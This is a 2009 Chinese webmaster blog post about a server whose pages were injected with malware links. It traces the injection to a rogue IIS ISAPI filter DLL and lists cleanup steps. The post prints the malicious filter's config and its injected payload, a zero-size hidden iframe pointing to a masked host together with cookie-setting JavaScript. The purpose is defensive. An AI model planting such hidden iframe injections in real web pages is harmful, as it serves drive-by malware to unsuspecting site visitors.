当前位置: 首页 > 图文教程 > 网站运营 > 建站经验 > 个人站长在网站被挂马后的应对办法

建站经验
一个80后农村站长的建站之路
互联网商业模式无限企业之一:中介渠道
陈健:网站流量在你手里已经死了
网站要想做大就得有自己的模式
做论坛聚人气 要有别人需要的东西和双专业
WordPress 缓存插件
Blog必备利器之搬家工具(服务)详解
如何让WP一分类下的文章不在Feed输出
地方站的潜力与发展契机
孙宏哲:专业论坛发展九步骤
新手建站详细5步曲:不懂技术 网站照样红火
Wordpress优化 30个优秀的细节设计与插件
个人网站推广网络运营及营销上的三个节点
八年站长老兵讲述:运营本地人才网的思路
站长们 别被别人所谓真理蒙蔽
张何:企业营销型网站建设与推广的重要性
中初级站长 做站请少走弯路
黄相如:Google到底想干什么
麻城乡情网站长谈用户体验永远是网站建设的根本
黄相如:网恋十年了!

建站经验 中的 个人站长在网站被挂马后的应对办法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-17   浏览: 93 ::
收藏到网摘: n/a

最近实在头疼,我的网站www.haorx.com,反复被一个www.17aq.com的网站挂马,一打开网站后,马上就会要你安装一个什么软件,我打开17aq的网站,准备查一下联系方式,告诉人家别在我的网站上挂马。但人家根本就没有页面,显然是一个挂马的网站,怎么办(请各位看官给我支个招)?

下面我说一下,我找这个马的过程:

现象是一台服务器几乎所有网站打开网页 甚至HTML网页 都出现了

《iframe src=“http://www.XXXXXXXXXXXXX.com/mmmmmmm.htm” height=0 width=0》《/iframe》 这种样式的代码 一般在头部部分杀毒软件打开会报毒

打开HTML或ASP PHP页面在源码中怎么也找不到这段代码起初会怀疑是JS,找了半天还是没有发现,连新建的HTML页面也会有这段代码~

仔细寻找问题应该在IIS上,打开IIS重新启动一次在主IIS上右键属性-----ISAPI,发现一个ISAPI扩展,没见过的,路径为:c:\windows\help\wanps.dll ,ISAP加载正常绿色状态,取消重新启动IIS,所有代码消失。

可以判断就是这个文件在作怪,提取出来就是者三个文件

wanps.ini内容为:

[Filter]

Cookie=GAG5=ABCDEFG

Redirector=C:\windows\help\wanps.txt

wanps.txt内容为:

《body》

《iframe src=“http://www.XXXXXX.com/mm.htm” height=0 width=0》《/iframe》

《script language=“javascript”》

《!--

var expires = new Date();

expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);

document.cookie=“GAG5=ABCDEFG;expires=”+expires.toGMTString();

--》

《/script》

《/body》

打此为此,马算是解决了,但后门肯定已经被人家掌握了,我清除马以后,过一段时间,又被人家挂上马了。哎~~~~

在网上查到一些解决挂马的办法,附上,希望对大家有用

首先发现自己访问多个站点被挂马以后需要按以下流程操作解决

1、迅速访问www.baidu.com看BAIDU是否被挂马,用于排除自己的PC中病毒引起的问题。如果你访问www.baidu.com也是被挂马的话,那你就杀毒就可以了!熊猫烧香好象应用了类似的预防被杀掉的措施。

2、迅速登陆FTP或者进入服务器查看相关文件是否被写入了代码,如果被写入代码那就找规律清除吧,某些黑客用批量文本替换工具挂的马,所以你找到替换字符,替换回来就可以迅速解决。

3、如果以上两个方案都没解决,迅速打开IIS,查看仔细寻找 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的 ISAP加载正常 绿色状态 取消 重新启动IIS 所有代码消失

4、如果还没有解决,那你就可以放心了,不是你的机器被入侵了,速速告诉机房,和你同一网关下的某机器被拿下来,被设置了ARP欺骗。这个现象就是包括服务器的404页面都被挂了马。你可以在防火墙里设置一些规则来避免掉。我所说的这个方法也是现在最流行的挂马的方法!